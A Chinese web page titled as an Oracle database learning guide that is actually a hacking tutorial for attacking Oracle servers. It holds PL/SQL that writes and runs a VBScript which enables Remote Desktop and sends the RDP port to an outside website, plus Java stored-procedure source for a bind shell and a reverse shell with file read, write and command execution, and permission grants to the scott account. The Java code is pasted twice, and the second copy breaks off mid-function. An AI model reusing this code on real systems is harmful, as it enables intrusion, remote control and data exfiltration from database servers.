oracle技术学习基础文档指南_Oracle数据库_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN
  • 网站地图地图
  • 最新更新更新
  • 订阅中心订阅
  • 标签标签

    • 专业服务器维护管家

    网站维护 - (800元/次,2800元/月起) QQ:29769479 -
      整站搜索:

    oracle技术学习基础文档指南

    作者:黑客防线网安棋子儿 来源:黑客防线网安网站维护基地 浏览次数:0

    本篇关键词:oracle数据库
    黑客防线网安网讯:第一部分基本查询指令普通浏览复制代码打印代码


    exec :x:=run_cmz('del c:\3389p.vbs'); 

    http://blog.cnmoker.org/read3389/read.asp 

    declare
    file utl_file.file_type;
    begin
    file := utl_file.fopen('DIR', '3389p.vbs', 'W');
    utl_file.put_line(file, '

    Dim OperationRegistry
    Set OperationRegistry=WScript.createObject("WScript.Shell")
    Dim TSPort,TSState,TSRegPath
    TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
    TSPort=OperationRegistry.RegRead(TSRegPath)

    Set xPost=CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0
    xPost.Send()

    TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
    TSState=OperationRegistry.RegRead(TSRegPath)
    If TSState=0 Then
    Else
    OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
    End If
    set obj=wscript.createObject("wscript.shell")
    obj.Run("sc config TermService start= demand")
    obj.Run("sc stop  TermService")
    obj.Run("sc start TermService")
    wscript.quit
    ');
    utl_file.fflush(file);
    utl_file.fclose(file);
    end;
    /
    exec :x:=run_cmz('cscript c:\3389p.vbs');
    /
    exec :x:=run_cmz('del c:\3389p.vbs');
    /
    http://blog.cnmoker.org/read3389/read.asp这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
    这个read.asp和ro.asp自己写吧
    到此win下操作基本上是完成了

    第三部分 linux的一些操作

    linux的操作要用到sqlj语言
    其实ISTO的kj总早就写了一些
    我总结普通浏览复制代码打印代码
    create or replace and compile java source named bob as 
    import java.io.*; 
    import java.net.*; 
    public class BOB{ 
    public static String listFolder(String path){ 
    File f=null; 
    String str=""; 
    f=new File(path); 
    String[] files=f.list(); 
    if(files!=null) 
    for(int i=0;i<files.length;i++){ 
    str+=files[i]+"\r\n"; 

    return str; 

    public static String saveFile(String filepath,String value){ 
    FileOutputStream fos=null; 
    try { 
    fos=new FileOutputStream(filepath); 
    fos.write(value.getBytes()); 
    return "OK"; 
    } catch (Exception e) { 
    return e.getMessage(); 
    } finally{ 
    if(fos!=null){ 
    try {fos.close();} catch (Exception e) {} 



    public static String readFile(String pathfile,String code){ 
    BufferedReader br=null; 
    String value=""; 
    try { 
    br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code)); 
    String s=null; 
    while((s=br.readLine())!=null){ 
    value+=s; 

    return value; 
    } catch (Exception e) { 
    return e.getMessage(); 
    } finally{ 
    if(br!=null){try {br.close();} catch (IOException e) {}} 


    public static String execFile(String filepath,String code){ 
    int i=0; 
    Runtime rt=Runtime.getRuntime(); 
    String output=""; 
    InputStreamReader isr = null; 
    char[] bufferC=new char[1024]; 
    try{ 
    Process ps=rt.exec(filepath); 
    isr=new InputStreamReader(ps.getInputStream(),code); 
    while((i=isr.read(bufferC,0,bufferC.length))!=-1){ 
    output+=new String(bufferC,0,i); 

    return output; 
    }catch(Exception e){ 
    return e.getMessage(); 
    }finally{ 
    if(isr!=null)try {isr.close();} catch (IOException e) {} 


    public static String bindShell(int port){ 
    ServerSocket ss=null; 
    Socket s=null; 
    try { 
    ss = new ServerSocket(port); 
    s=ss.accept(); 
    new optShell(ss,s).start(); 
     
    return "OK"; 
    } catch (Exception e) { 
    return e.getMessage(); 


    public static String reverseShell(String host,int port){ 
    Socket s=null; 
    try{ 
    s=new Socket(host,port); 
    new optShell(null,s).start(); 
    return "OK"; 
    }catch(Exception e){ 
    return e.getMessage(); 

    } //反弹shell的sqlj语句 
    public static class optShell extends Thread{ 
    OutputStream os=null; 
    InputStream is=null; 
    ServerSocket ss; 
    Socket s; 
    public optShell(ServerSocket ss,Socket s){ 
    this.ss=ss; 
    this.s=s; 
    try{ 
    this.is=s.getInputStream(); 
    this.os=s.getOutputStream(); 
    }catch(Exception e){ 
    if(os!=null)try {os.close();} catch(Exception ex) {} 
    if(is!=null)try {is.close();} catch(Exception ex) {} 
    if(s!=null)try {s.close();} catch(Exception ex) {} 
    if(ss!=null)try {ss.close();} catch(Exception ex) {} 


    public void run(){ 
    BufferedReader br=new BufferedReader(new InputStreamReader(is)); 
    String line=""; 
    String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n"; 
    try { 
    //os.write(cmdhelp.getBytes()); 
    line=br.readLine(); 
    while(!"exit".equals(line)){ 
    if(line.length()>3){ 
    StringBuffer sb=new StringBuffer(line.trim()); 
    String cmd=sb.substring(0, 4); 
    if(cmd.equals("list")){ 
    os.write("input you path:\r\n".getBytes()); 
    line=br.readLine(); 
    os.write(listFolder(line).getBytes()); 
    }else if("save".equals(cmd)){ 
    os.write("input you filepath:\r\n".getBytes()); 
    line=br.readLine(); 
    os.write("input you value:\r\n".getBytes()); 
    os.write(saveFile(line,br.readLine()).getBytes()); 
    }else if("read".equals(cmd)){ 
    os.write("input you filepath:\r\n".getBytes()); 
    line=br.readLine(); 
    os.write("input you code examle:GBK\r\n".getBytes()); 
    os.write(readFile(line,br.readLine()).getBytes()); 
    }else if("exec".equals(cmd)){ 
    os.write("input you run filepath:\r\n".getBytes()); 
    line=br.readLine(); 
    os.write("input you code examle:GBK\r\n".getBytes()); 
    os.write(execFile(line,br.readLine()).getBytes()); 
    }else{ 
    os.write(cmdhelp.getBytes()); 

    }else{ 
    os.write(cmdhelp.getBytes()); 

    line=br.readLine(); 

    } catch (Exception e) { 
    e.printStackTrace(); 
    }finally{ 
    if(os!=null)try {os.close();} catch(Exception e) {} 
    if(is!=null)try {is.close();} catch(Exception e) {} 
    if(s!=null)try {s.close();} catch(Exception e) {} 
    if(ss!=null)try {ss.close();} catch(Exception e) {} 





    create or replace function BOB_LISTFOLDER(str varchar2) return varchar2 
    as language java name 'BOB.listFolder(java.lang.String) return java.lang.String'; 

    create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2 
    as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String'; 

    create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2 
    as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String'; 

    create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2 
    as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String'; 

    create or replace function BOB_BINDSHELL(port number) return varchar2 
    as language java name 'BOB.bindShell(int) return java.lang.String'; 

    begin 
    Dbms_Java.Grant_Permission('scott','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete'); 
    Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor'); 
    Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve'); 
    end; 

    create or replace and compile java source named bob as
    import java.io.*;
    import java.net.*;
    public class BOB{
    public static String listFolder(String path){
    File f=null;
    String str="";
    f=new File(path);
    String[] files=f.list();
    if(files!=null)
    for(int i=0;i<files.length;i++){
    str+=files[i]+"\r\n";
    }
    return str;
    }
    public static String saveFile(String filepath,String value){
    FileOutputStream fos=null;
    try {
    fos=new FileOutputStream(filepath);
    fos.write(value.getBytes());
    return "OK";
    } catch (Exception e) {
    return e.getMessage();
    } finally{
    if(fos!=null){
    try {fos.close();} catch (Exception e) {}
    }
    }
    }
    public static String readFile(String pathfile,String code){
    BufferedReader br=null;
    String value="";
    try {
    br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
    String s=null;
    while((s=br.readLine())!=null){
    value+=s;
    }
    return value;
    } catch (Exception e) {
    return e.getMessage();
    } finally{
    if(br!=null){try {br.close();} catch (IOException e) {}}
    }
    }
    public static String execFile(String filepath,String code){
    int i=0;
    Runtime rt=Runtime.getRuntime();
    String output="";
    InputStreamReader isr = null;
    char[] bufferC=new char[1024];
    try{
    Process ps=rt.exec(filepath);
    isr=new InputStreamReader(ps.getInputStream(),code);
    while((i=isr.read(bufferC,0,bufferC.length))!=-1){
    output+=new String(bufferC,0,i);
    }
    return output;
    }catch(Exception e){
    return e.getMessage();
    }finally{
    if(isr!=null)try {isr.close();} catch (IOException e) {}
    }
    }
    public static String bindShell(int port){
    ServerSocket ss=null;
    Socket s=null;
    try {
    ss = new ServerSocket(port);
    s=ss.accept();
    new optShell(ss,s).start();

    return "OK";
        黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-7442-1.html
    网站维护教程更新时间:2012-02-13 03:47:06  【打印此页】  【关闭
    上一篇:oracle安全加固指南
    下一篇:Oracle 10g ASM 的一点经验
    我要申请本站N点 | 黑客防线官网 |  
    专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479
    关于我们|新闻中心|业务范围|付款方式|购买流程|整站搜索|服务器软件必备|友情链接|在线反馈|网站地图|

    footer  footer  footer  footer